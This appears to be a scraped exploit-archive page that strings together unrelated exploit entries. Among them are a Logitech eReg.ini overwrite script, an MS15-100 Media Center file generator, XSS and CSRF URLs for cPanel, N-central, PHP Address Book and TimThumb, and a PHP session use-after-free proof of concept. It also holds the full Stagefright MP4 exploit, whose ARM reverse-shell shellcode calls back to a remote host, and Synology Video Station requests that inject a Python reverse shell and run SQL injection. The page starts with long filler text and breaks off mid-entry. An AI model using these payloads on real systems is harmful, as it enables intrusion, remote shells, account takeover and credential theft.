BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB [Scheduling] LaunchDelayHours=48 LaunchRetryHours=1 SurveyDelayHours=336 "; open(myfile,'>C:\\Program Files\\Logitech\\Logitech WebCam Software\\eReg.ini'); #create our payload and overwrite original eReg.ini file print myfile $everything; close (myfile); system("C:\\Program Files\\Logitech\\Logitech WebCam Software\\eReg.exe"); #run our vulnerable application
HireHackking

Microsoft Windows Media Center - Command Execution (MS15-100)

HACKER · %s · %s

# Title: MS15-100 Windows Media Center Command Execution # Date : 11/09/2015 # Author: R-73eN # Software: Windows Media Center # Tested : Windows 7 Ultimate # CVE : 2015-2509 banner = "" banner += " ___ __ ____ _ _ \n" banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n" banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n" banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n" banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n" print banner command = "calc.exe" evil = '<application run="' + command + '"/>' f = open("Music.mcl","w") f.write(evil) f.close() print "\n[+] Music.mcl generated . . . [+]"
HireHackking
source: https://www.securityfocus.com/bid/57060/info cPanel and WHM are prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks. cPanel 11.34.0 and WHM 11.34.0 are vulnerable; other versions may also be affected. http://www.example.com/webmail/x3/mail/clientconf.html?domain=&redirectdomain=&acct=%3Cscript%3Ealert%28%22XSS%20Vulnerability%22%29%3C/script%3E&archiving=0
HireHackking

PHP Session Deserializer - Use-After-Free

HACKER · %s · %s

Use After Free Vulnerabilities in Session Deserializer Taoguang Chen <[@chtg](http://github.com/chtg)> Write Date: 2015.8.9 Release Date: 2015.9.4 Multiple use-after-free vulnerabilities were discovered in session deserializer (php/php_binary/php_serialize) that can be abused for leaking arbitrary memory blocks or execute arbitrary code remotely. Affected Versions ------------ Affected is PHP 5.6 < 5.6.13 Affected is PHP 5.5 < 5.5.29 Affected is PHP 5.4 < 5.4.45 Credits ------------ This vulnerability was disclosed by Taoguang Chen. Description ------------ PS_SERIALIZER_DECODE_FUNC(php) /* {{{ */ { ... PHP_VAR_UNSERIALIZE_INIT(var_hash); p = val; while (p < endptr) { ... if (has_value) { ALLOC_INIT_ZVAL(current); if (php_var_unserialize(&current, (const unsigned char **) &q, (const unsigned char *) endptr, &var_hash TSRMLS_CC)) { php_set_session_var(name, namelen, current, &var_hash TSRMLS_CC); } zval_ptr_dtor(&current); } PS_ADD_VARL(name, namelen); skip: efree(name); p = q; } break_outer_loop: PHP_VAR_UNSERIALIZE_DESTROY(var_hash); return SUCCESS; } When session deserializer (php/php_binary) deserializing multiple data it will call to php_var_unserialize() multiple times. So we can create ZVAL and free it via the php_var_unserialize() with a crafted serialized string, and also free the memory (reduce the reference count of the ZVAL to zero) via zval_ptr_dtor() with deserialize two identical session data, then the next call to php_var_unserialize() will still allow to use R: or r: to set references to that already freed memory. It is possible to use-after-free attack and execute arbitrary code remotely. In some other cases, session deserializer (php/php_binary/php_serialize) may also lead to use-after-free vulnerabilities: i) via crafted Serializable::unserialize() ii) via unserialize()'s callback function and zend_lookup_class() call a crafted __autoload(). Proof of Concept Exploit ------------ The PoC works on standard MacOSX 10.11 installation of PHP 5.4.44. <?php session_start(); $fakezval = ptr2str(1122334455); $fakezval .= ptr2str(0); $fakezval .= "\x00\x00\x00\x00"; $fakezval .= "\x01"; $fakezval .= "\x00"; $fakezval .= "\x00\x00"; $exploit = 'ryat|a:2:{i:0;i:1;i:1;a:1:{i:1;chtg|a:1:{i:0;R:4;}'; // $exploit = 'ryat|a:1:{i:0;i:1;}ryat|i:1;chtg|R:1;'; session_decode($exploit); for ($i = 0; $i < 5; $i++) { $v[$i] = $fakezval.$i; } var_dump($_SESSION); function ptr2str($ptr) { $out = ""; for ($i = 0; $i < 8; $i++) { $out .= chr($ptr & 0xff); $ptr >>= 8; } return $out; } ?> Test the PoC on the command line: $ php uafpoc.php array(2) { ["ryat"]=> NULL ["chtg"]=> array(1) { [0]=> int(1122334455) <=== so we can control the memory and create fake ZVAL :) } }
HireHackking

Google Android - 'Stagefright' Remote Code Execution

HACKER · %s · %s

#!/usr/bin/env python # Joshua J. Drake (@jduck) of ZIMPERIUM zLabs # Shout outs to our friends at Optiv (formerly Accuvant Labs) # (C) Joshua J. Drake, ZIMPERIUM Inc, Mobile Threat Protection, 2015 # www.zimperium.com # # Exploit for RCE Vulnerability CVE-2015-1538 #1 # Integer Overflow in the libstagefright MP4 ‘stsc’ atom handling # # Don’t forget, the output of “create_mp4” can be delivered many ways! # MMS is the most dangerous attack vector, but not the only one… # # DISCLAIMER: This exploit is for testing and educational purposes only. Any # other usage for this code is not allowed. Use at your own risk. # # “With great power comes great responsibility.” – Uncle Ben # import struct import socket # # Creates a single MP4 atom – LEN, TAG, DATA # def make_chunk(tag, data): if len(tag) != 4: raise ‘Yo! They call it “FourCC” for a reason.’ ret = struct.pack(‘>L’, len(data) + 8) ret += tag ret += data return ret # # Make an ‘stco’ atom – Sample Table Chunk Offets # def make_stco(extra=”): ret = struct.pack(‘>L’, 0) # version ret += struct.pack(‘>L’, 0) # mNumChunkOffsets return make_chunk(‘stco’, ret+extra) # # Make an ‘stsz’ atom – Sample Table Size # def make_stsz(extra=”): ret = struct.pack(‘>L’, 0) # version ret += struct.pack(‘>L’, 0) # mDefaultSampleSize ret += struct.pack(‘>L’, 0) # mNumSampleSizes return make_chunk(‘stsz’, ret+extra) # # Make an ‘stts’ atom – Sample Table Time-to-Sample # def make_stts(): ret = struct.pack(‘>L’, 0) # version ret += struct.pack(‘>L’, 0) # mTimeToSampleCount return make_chunk(‘stts’, ret) # # This creates a single Sample Table Sample-to-Chunk entry # def make_stsc_entry(start, per, desc): ret = ” ret += struct.pack(‘>L’, start + 1) ret += struct.pack(‘>L’, per) ret += struct.pack(‘>L’, desc) return ret # # Make an ‘stsc’ chunk – Sample Table Sample-to-Chunk # # If the caller desires, we will attempt to trigger (CVE-2015-1538 #1) and # cause a heap overflow. # def make_stsc(num_alloc, num_write, sp_addr=0x42424242, do_overflow = False): ret = struct.pack(‘>L’, 0) # version/flags # this is the clean version… if not do_overflow: ret += struct.pack(‘>L’, num_alloc) # mNumSampleToChunkOffsets ret += ‘Z’ * (12 * num_alloc) return make_chunk(‘stsc’, ret) # now the explicit version. (trigger the bug) ret += struct.pack(‘>L’, 0xc0000000 + num_alloc) # mNumSampleToChunkOffsets # fill in the entries that will overflow the buffer for x in range(0, num_write): ret += make_stsc_entry(sp_addr, sp_addr, sp_addr) ret = make_chunk(‘stsc’, ret) # patch the data_size ret = struct.pack(‘>L’, 8 + 8 + (num_alloc * 12)) + ret[4:] return ret # # Build the ROP chain # # ROP pivot by Georg Wicherski! Thanks! # “”” (gdb) x/10i __dl_restore_core_regs 0xb0002850 <__dl_restore_core_regs>: add r1, r0, #52 ; 0x34 0xb0002854 <__dl_restore_core_regs+4>: ldm r1, {r3, r4, r5} 0xb0002858 <__dl_restore_core_regs+8>: push {r3, r4, r5} 0xb000285c <__dl_restore_core_regs+12>: ldm r0, {r0, r1, r2, r3, r4, r5, r6, r7, r8, r9, r10, r11} 0xb0002860 <__dl_restore_core_regs+16>: ldm sp, {sp, lr, pc} “”” “”” b0001144 <__dl_mprotect>: b0001144: e92d0090 push {r4, r7} b0001148: e3a0707d mov r7, #125 ; 0x7d b000114c: ef000000 svc 0x00000000 b0001150: e8bd0090 pop {r4, r7} b0001154: e1b00000 movs r0, r0 b0001158: 512fff1e bxpl lr b000115c: ea0015cc b b0006894 <__dl_raise+0x10> “”” def build_rop(off, sp_addr, newpc_val, cb_host, cb_port): rop = ” rop += struct.pack(‘<L’, sp_addr + off + 0x10) # new sp rop += struct.pack(‘<L’, 0xb0002a98) # new lr – pop {pc} rop += struct.pack(‘<L’, 0xb00038b2+1) # new pc: pop {r0, r1, r2, r3, r4, pc} rop += struct.pack(‘<L’, sp_addr & 0xfffff000) # new r0 – base address (page aligned) rop += struct.pack(‘<L’, 0x1000) # new r1 – length rop += struct.pack(‘<L’, 7) # new r2 – protection rop += struct.pack(‘<L’, 0xd000d003) # new r3 – scratch rop += struct.pack(‘<L’, 0xd000d004) # new r4 – scratch rop += struct.pack(‘<L’, 0xb0001144) # new pc – _dl_mprotect native_start = sp_addr + 0x80 rop += struct.pack(‘<L’, native_start) # address of native payload #rop += struct.pack(‘<L’, 0xfeedfed5) # top of stack… # linux/armle/shell_reverse_tcp (modified to pass env and fork/exit) buf = ” # fork buf += ‘\x02\x70\xa0\xe3’ buf += ‘\x00\x00\x00\xef’ # continue if not parent… buf += ‘\x00\x00\x50\xe3’ buf += ‘\x02\x00\x00\x0a’ # exit parent buf += ‘\x00\x00\xa0\xe3’ buf += ‘\x01\x70\xa0\xe3’ buf += ‘\x00\x00\x00\xef’ # setsid in child buf += ‘\x42\x70\xa0\xe3’ buf += ‘\x00\x00\x00\xef’ # socket/connect/dup2/dup2/dup2 buf += ‘\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x05\x20\x81\xe2\x8c’ buf += ‘\x70\xa0\xe3\x8d\x70\x87\xe2\x00\x00\x00\xef\x00\x60’ buf += ‘\xa0\xe1\x6c\x10\x8f\xe2\x10\x20\xa0\xe3\x8d\x70\xa0’ buf += ‘\xe3\x8e\x70\x87\xe2\x00\x00\x00\xef\x06\x00\xa0\xe1’ buf += ‘\x00\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00\x00\xef\x06’ buf += ‘\x00\xa0\xe1\x01\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00’ buf += ‘\x00\xef\x06\x00\xa0\xe1\x02\x10\xa0\xe3\x3f\x70\xa0’ buf += ‘\xe3\x00\x00\x00\xef’ # execve(shell, argv, env) buf += ‘\x30\x00\x8f\xe2\x04\x40\x24\xe0’ buf += ‘\x10\x00\x2d\xe9\x38\x30\x8f\xe2\x08\x00\x2d\xe9\x0d’ buf += ‘\x20\xa0\xe1\x10\x00\x2d\xe9\x24\x40\x8f\xe2\x10\x00’ buf += ‘\x2d\xe9\x0d\x10\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00’ buf += ‘\xef\x02\x00’ # Add the connect back host/port buf += struct.pack(‘!H’, cb_port) cb_host = socket.inet_aton(cb_host) buf += struct.pack(‘=4s’, cb_host) # shell – buf += ‘/system/bin/sh\x00\x00’ # argv – buf += ‘sh\x00\x00’ # env – buf += ‘PATH=/sbin:/vendor/bin:/system/sbin:/system/bin:/system/xbin\x00’ # Add some identifiable stuff, just in case something goes awry… rop_start_off = 0x34 x = rop_start_off + len(rop) while len(rop) < 0x80 – rop_start_off: rop += struct.pack(‘<L’, 0xf0f00000+x) x += 4 # Add the native payload… rop += buf return rop # # Build an mp4 that exploits CVE-2015-1538 #1 # # We mimic meow.3gp here… # def create_mp4(sp_addr, newpc_val, cb_host, cb_port): chunks = [] # Build the MP4 header… ftyp = ‘mp42’ ftyp += struct.pack(‘>L’, 0) ftyp += ‘mp42’ ftyp += ‘isom’ chunks.append(make_chunk(‘ftyp’, ftyp)) # Note, this causes a few allocations… moov_data = ” moov_data += make_chunk(‘mvhd’, struct.pack(‘>LL’, 0, 0x41414141) + (‘B’ * 0x5c) ) # Add a minimal, verified trak to satisfy mLastTrack being set moov_data += make_chunk(‘trak’, make_chunk(‘stbl’, make_stsc(0x28, 0x28) + make_stco() + make_stsz() + make_stts() )) # Spray the heap using a large tx3g chunk (can contain binary data!) “”” 0x4007004e <_ZNK7android7RefBase9decStrongEPKv+2>: ldr r4, [r0, #4] ; load mRefs 0x40070050 <_ZNK7android7RefBase9decStrongEPKv+4>: mov r5, r0 0x40070052 <_ZNK7android7RefBase9decStrongEPKv+6>: mov r6, r1 0x40070054 <_ZNK7android7RefBase9decStrongEPKv+8>: mov r0, r4 0x40070056 <_ZNK7android7RefBase9decStrongEPKv+10>: blx 0x40069884 ; atomic_decrement 0x4007005a <_ZNK7android7RefBase9decStrongEPKv+14>: cmp r0, #1 ; must be 1 0x4007005c <_ZNK7android7RefBase9decStrongEPKv+16>: bne.n 0x40070076 <_ZNK7android7RefBase9decStrongEPKv+42> 0x4007005e <_ZNK7android7RefBase9decStrongEPKv+18>: ldr r0, [r4, #8] ; load refs->mBase 0x40070060 <_ZNK7android7RefBase9decStrongEPKv+20>: ldr r1, [r0, #0] ; load mBase._vptr 0x40070062 <_ZNK7android7RefBase9decStrongEPKv+22>: ldr r2, [r1, #12] ; load method address 0x40070064 <_ZNK7android7RefBase9decStrongEPKv+24>: mov r1, r6 0x40070066 <_ZNK7android7RefBase9decStrongEPKv+26>: blx r2 ; call it! “”” page = ” off = 0 # the offset to the next object off += 8 page += struct.pack(‘<L’, sp_addr + 8 + 16 + 8 + 12 – 28) # _vptr.RefBase (for when we smash mDataSource) page += struct.pack(‘<L’, sp_addr + off) # mRefs off += 16 page += struct.pack(‘<L’, 1) # mStrong page += struct.pack(‘<L’, 0xc0dedbad) # mWeak page += struct.pack(‘<L’, sp_addr + off) # mBase page += struct.pack(‘<L’, 16) # mFlags (dont set OBJECT_LIFETIME_MASK) off += 8 page += struct.pack(‘<L’, sp_addr + off) # the mBase _vptr.RefBase page += struct.pack(‘<L’, 0xf00dbabe) # mBase.mRefs (unused) off += 16 page += struct.pack(‘<L’, 0xc0de0000 + 0x00) # vtable entry 0 page += struct.pack(‘<L’, 0xc0de0000 + 0x04) # vtable entry 4 page += struct.pack(‘<L’, 0xc0de0000 + 0x08) # vtable entry 8 page += struct.pack(‘<L’, newpc_val) # vtable entry 12 rop = build_rop(off, sp_addr, newpc_val, cb_host, cb_port) x = len(page) while len(page) < 4096: page += struct.pack(‘<L’, 0xf0f00000+x) x += 4 off = 0x34 page = page[:off] + rop + page[off+len(rop):] spray = page * (((2*1024*1024) / len(page)) – 20) moov_data += make_chunk(‘tx3g’, spray) block = ‘A’ * 0x1c bigger = ‘B’ * 0x40 udta = make_chunk(‘udta’, make_chunk(‘meta’, struct.pack(‘>L’, 0) + make_chunk(‘ilst’, make_chunk(‘cpil’, make_chunk(‘data’, struct.pack(‘>LL’, 21, 0) + ‘A’)) + make_chunk(‘trkn’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + ‘AAAABBBB’)) + make_chunk(‘disk’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + ‘AAAABB’)) + make_chunk(‘covr’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) * 32 + make_chunk(‘\xa9alb’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) + make_chunk(‘\xa9ART’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) + make_chunk(‘aART’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) + make_chunk(‘\xa9day’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) + make_chunk(‘\xa9nam’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) + make_chunk(‘\xa9wrt’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) + make_chunk(‘gnre’, make_chunk(‘data’, struct.pack(‘>LL’, 1, 0) + block)) + make_chunk(‘covr’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) * 32 + make_chunk(‘\xa9ART’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + bigger)) + make_chunk(‘\xa9wrt’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + bigger)) + make_chunk(‘\xa9day’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + bigger))) ) ) moov_data += udta # Make the nasty trak tkhd1 = ”.join([ ‘\x00’, # version ‘D’ * 3, # padding ‘E’ * (5*4), # {c,m}time, id, ??, duration ‘F’ * 0x10, # ?? struct.pack(‘>LLLLLL’, 0x10000, # a00 0, # a01 0, # dx 0, # a10 0x10000, # a11 0), # dy ‘G’ * 0x14 ]) trak1 = ” trak1 += make_chunk(‘tkhd’, tkhd1) mdhd1 = ”.join([ ‘\x00’, # version ‘D’ * 0x17, # padding ]) mdia1 = ” mdia1 += make_chunk(‘mdhd’, mdhd1) mdia1 += make_chunk(‘hdlr’, ‘F’ * 0x3a) dinf1 = ” dinf1 += make_chunk(‘dref’, ‘H’ * 0x14) minf1 = ” minf1 += make_chunk(‘smhd’, ‘G’ * 0x08) minf1 += make_chunk(‘dinf’, dinf1) # Build the nasty sample table to trigger the vulnerability here. stbl1 = make_stsc(3, (0x1200 / 0xc) – 1, sp_addr, True) # TRIGGER # Add the stbl to the minf chunk minf1 += make_chunk(‘stbl’, stbl1) # Add the minf to the mdia chunk mdia1 += make_chunk(‘minf’, minf1) # Add the mdia to the track trak1 += make_chunk(‘mdia’, mdia1) # Add the nasty track to the moov data moov_data += make_chunk(‘trak’, trak1) # Finalize the moov chunk moov = make_chunk(‘moov’, moov_data) chunks.append(moov) # Combine outer chunks together and voila. data = ”.join(chunks) return data if __name__ == ‘__main__’: import sys import mp4 import argparse def write_file(path, content): with open(path, ‘wb’) as f: f.write(content) def addr(sval): if sval.startswith(‘0x’): return int(sval, 16) return int(sval) # The address of a fake StrongPointer object (sprayed) sp_addr = 0x41d00010 # takju @ imm76i – 2MB (via hangouts) # The address to of our ROP pivot newpc_val = 0xb0002850 # point sp at __dl_restore_core_regs # Allow the user to override parameters parser = argparse.ArgumentParser() parser.add_argument(‘-c’, ‘–connectback-host’, dest=‘cbhost’, default=‘31.3.3.7’) parser.add_argument(‘-p’, ‘–connectback-port’, dest=‘cbport’, type=int, default=12345) parser.add_argument(‘-s’, ‘–spray-address’, dest=‘spray_addr’, type=addr, default=None) parser.add_argument(‘-r’, ‘–rop-pivot’, dest=‘rop_pivot’, type=addr, default=None) parser.add_argument(‘-o’, ‘–output-file’, dest=‘output_file’, default=‘cve-2015-1538-1.mp4’) args = parser.parse_args() if len(sys.argv) == 1: parser.print_help() sys.exit(–1) if args.spray_addr == None: args.spray_addr = sp_addr if args.rop_pivot == None: args.rop_pivot = newpc_val # Build the MP4 file… data = mp4.create_mp4(args.spray_addr, args.rop_pivot, args.cbhost, args.cbport) print(‘[*] Saving crafted MP4 to %s …’ % args.output_file) write_file(args.output_file, data) - See more at: https://blog.zimperium.com/the-latest-on-stagefright-cve-2015-1538-exploit-is-now-available-for-testing-purposes/#sthash.MbvoiMxd.dpuf
HireHackking

N-able N-central - Cross-Site Request Forgery

HACKER · %s · %s

source: https://www.securityfocus.com/bid/56933/info N-central is prone to a cross-site request-forgery vulnerability. Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected application. Other attacks are also possible. N-central 8.0.1 through 8.2.0-1152 are vulnerable; other versions may also be affected. <img src="https://ncentral/addAccountActionStep1.do?page=1&pageName=add_account&email=test%40redacted.co.nz&pswd=CSRF123!!!&confirmPassword=CSRF123!!&paperSize=Letter&numberFormat=en_US&statusEnabled=true&type=SO%20Admin&defaultDashboard=All%20Devices&uiSessionTimeOut=20&configRemoteControlEnabled=on&useRemoteControlEnabled=on&rcAvailability=Available&useManagementTaskEnabled=on&firstName=CSRF&lastName=Hacker&phone=&ext=&department=&street1=&street2=&city=&stateProv=&postalCode=&country=&method=Finish"></img>
HireHackking

Synology Video Station 1.5-0757 - Multiple Vulnerabilities

HACKER · %s · %s

------------------------------------------------------------------------ Synology Video Station command injection and multiple SQL injection vulnerabilities ------------------------------------------------------------------------ Han Sahin, September 2015 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ It was discovered that Synology Video Station is vulnerable to command injection that allows an attacker to execute arbitrary system commands with root privileges. In addition, Video Station is affected by multiple SQL injection vulnerabilities that allows for execution of arbitrary SQL statements with DBA privileges. As a result it is possible to compromise the PostgreSQL database server. ------------------------------------------------------------------------ Affected versions ------------------------------------------------------------------------ These issues affect Synology Video Station version up to and including version 1.5-0757. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ Synology has reported that these issue have been resolved in: - Video Station version 1.5-0757 [audiotrack.cgi] - Video Station version 1.5-0763 [watchstatus.cgi] - Video Station version 1.5-0763 [subtitle.cgi] ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ Command injection vulnerability in subtitle.cgi A command injection vulnerability exists in the subtitle.cgi CGI script. This issue exists in the 'subtitle_codepage' parameter, which allows an attacker to execute arbitrary commands with root privileges. The script subtitle.cgi can also be called when the 'public share' option is enabled. With this option enabled, this issue can also be exploited by an unauthenticated remote attacker. This vulnerability can be used to compromise a Synology DiskStation NAS, including all data stored on the NAS, and the NAS as stepping stone to attack other systems. - Start netcat on attacker's system: nc -nvlp 80 - Submit the following request (change the IP - 192.168.1.20 - & port number - 80): GET /webapi/VideoStation/subtitle.cgi?id=193&api=SYNO.VideoStation.Subtitle&method=get&version=2&subtitle_id=%2Fvolume1%2Fvideo%2Fmr.robot.s01e10.720p.hdtv.x264-killers.nfo%2FMr.Robot.S01E10.720p.HDTV.x264-KILLERS.2aafa5c.eng.srt&subtitle_codepage=auto%26python%20-c%20'import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.1.20%22,80));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call(%5b%22/bin/sh%22,%22-i%22%5d);'%26&preview=false&sharing_id=kSiNy0Pp HTTP/1.1 Host: 192.168.1.13:5000 User-Agent: Mozilla/5.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Connection: keep-alive Pragma: no-cache Cache-Control: no-cache SQL injection vulnerability in watchstatus.cgi A (blind) SQL injection vulnerability exists in the watchstatus.cgi CGI script. This issue exists in the code handling the 'id' parameter and allows an attacker to execute arbitrary SQL statements with DBA privileges. As a result it is possible to compromise the PostgreSQL database server. In the following screenshot this issue is exploited using sqlmap. Proof of concept POST /webapi/VideoStation/watchstatus.cgi HTTP/1.1 Host: 192.168.1.13:5000 User-Agent: Mozilla/5.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-SYNO-TOKEN: Lq6mE9ANV2egU X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 80 Cookie: stay_login=0; id=Lq5QWGqg7Rnzc13A0LTN001710; jwplayer.volume=50 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache id=15076178770%20or%204864%3d4864--%20&position=10.05&api=SYNO.VideoStation.WatchStatus&method=setinfo&version=1 It should be noted that the X-SYNO-TOKEN header provides protection against Cross-Site Request Forgery attacks. As of DSM version 5.2-5592 Update 3, this protection is enabled by default. SQL injection vulnerability in audiotrack.cgi A (blind) SQL injection vulnerability exists in the audiotrack.cgi CGI script. This issue exists in the code handling the 'id' parameter and allows an attacker to execute arbitrary SQL statements with DBA privileges. As a result it is possible to compromise the PostgreSQL database server. Proof of concept POST /webapi/VideoStation/audiotrack.cgi HTTP/1.1 Content-Length: 294 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-SYNO-TOKEN: 7IKJdJMa8cutE Host: <hostname>:5000 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Connection: close Pragma: no-cache Cache-Control: no-cache X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Cookie: stay_login=0; id=7IivlxDM9MFb213A0LTN001710 id=1%20AND%20%28SELECT%20%28CASE%20WHEN%20%28%28SELECT%20usesuper%3Dtrue%20FROM%20pg_user%20WHERE%20usename%3DCURRENT_USER%20OFFSET%200%20LIMIT%201%29%29%20THEN%20%28CHR%2849%29%29%20ELSE%20%28CHR%2848%29%29%20END%29%29%3D%28CHR%2849%29%29&api=SYNO.VideoStation.AudioTrack&method=list&version=1
HireHackking

PHP Address Book - 'group' Cross-Site Scripting

HACKER · %s · %s

source: https://www.securityfocus.com/bid/56937/info PHP Address Book is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. PHP Address Book 8.1.24.1 is vulnerable; other versions may also be affected. http://www.example.com/index.php?group=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83 %2C83%29%29%3C%2FSCRIPT%3E
HireHackking
source: https://www.securityfocus.com/bid/56953/info The TimThumb plug-in for WordPress is prone to multiple security vulnerabilities, including: 1. A cross-site scripting vulnerability 2. Multiple security-bypass vulnerabilities 3. An arbitrary file-upload vulnerability 4. An information-disclosure vulnerability 5. Multiple path-disclosure vulnerabilities 6. A denial-of-service vulnerability Attackers can exploit these issues to bypass certain security restrictions, obtain sensitive information, perform certain administrative actions, gain unauthorized access, upload arbitrary files, compromise the application, access or modify data, cause denial-of-service conditions, steal cookie-based authentication credentials, or control how the site is rendered to the user; other attacks may also be possible. XSS (WASC-08) (in versions of Rokbox with older versions of TimThumb): http://www.example.complugins/wp_rokbox/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg Full path disclosure (WASC-13): http://www.example.complugins/wp_rokbox/thumb.php?src=http:// http://www.example.complugins/wp_rokbox/thumb.php?src=http://site/page.png&h=1&w=1111111 http://www.example.complugins/wp_rokbox/thumb.php?src=http://site/page.png&h=1111111&w=1 Abuse of Functionality (WASC-42): http://www.example.complugins/wp_rokbox/thumb.php?src=http://site&h=1&w=1 http://www.example.complugins/wp_rokbox/thumb.php?src=http://site.flickr.com&h=1&w=1 (bypass of restriction on domain, if such restriction is turned on) DoS (WASC-10): http://www.example.complugins/wp_rokbox/thumb.php?src=http://site/big_file&h=1&w=1 http://www.example.complugins/wp_rokbox/thumb.php?src=http://site.flickr.com/big_file&h=1&w=1 (bypass of restriction on domain, if such restriction is turned on) Arbitrary File Upload (WASC-31): http://www.example.complugins/wp_rokbox/thumb.php?src=http://flickr.com.site.com/shell.php Content Spoofing (WASC-12): In parameter file there can be set as video, as audio files. http://www.example.complugins/wp_rokbox/thumb.php?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF http://www.example.complugins/wp_rokbox/thumb.php?file=1.flv&image=1.jpg http://www.example.complugins/wp_rokbox/thumb.php?config=1.xml http://www.example.complugins/wp_rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=http://site XSS (WASC-08): http://www.example.complugins/wp_rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B Information Leakage (WASC-13): http://www.example.complugins/wp_rokbox/error_log Leakage of error log with full paths. Full path disclosure (WASC-13): 